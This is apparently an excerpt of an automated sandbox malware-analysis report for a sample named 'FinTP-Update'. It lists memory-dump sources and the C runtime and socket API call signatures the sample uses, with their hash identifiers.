                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1812809483-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$malloc$_errno$_callnewh
                                                                                                                              • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • API ID: _errno$_callnewh_getptd_noexitfreemalloc
                                                                                                                              • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                                                                              • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                              • API ID: __updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                              • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                              • API ID: freemallocstrchr$_errnorand
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                              • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                                                                              • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 761449704-0
                                                                                                                              • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1696598829-0
                                                                                                                              • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2964073243-0
                                                                                                                              • API ID: _snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3512837008-0
                                                                                                                              • API ID: malloc$_errno$_callnewh$Socket
                                                                                                                              • String ID: VUUU
                                                                                                                              • API String ID: 3688217515-2040033107
                                                                                                                              • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2026495703-0
                                                                                                                              • API ID: clock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3195780754-0
                                                                                                                              • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1991439119-0
                                                                                                                              • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID: B
                                                                                                                              • API String ID: 1812809483-1255198513
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2761444284-0
                                                                                                                              • API ID: free$malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2190258309-0
                                                                                                                              • API ID: malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2803490479-0